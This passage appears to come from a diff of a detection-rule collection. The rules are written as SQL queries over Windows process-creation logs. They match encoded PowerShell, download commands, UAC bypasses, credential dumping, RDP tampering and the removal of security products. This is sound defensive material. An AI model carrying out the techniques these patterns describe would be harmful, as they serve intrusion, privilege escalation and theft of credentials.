'%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "status": "experimental", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "status": "experimental", + "description": "Detects use of executionpolicy option to set insecure policies", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrator script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", + "status": "test", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1072", "attack.defense_evasion", - "attack.t1218" + "attack.t1574" ], "falsepositives": [ - "Legitimate usage by software developers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", - "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "status": "test", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1112" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "status": "experimental", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unknown" + "System administrator usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047" - ], + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Very unlikely" + "Command lines that use the same flags" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' 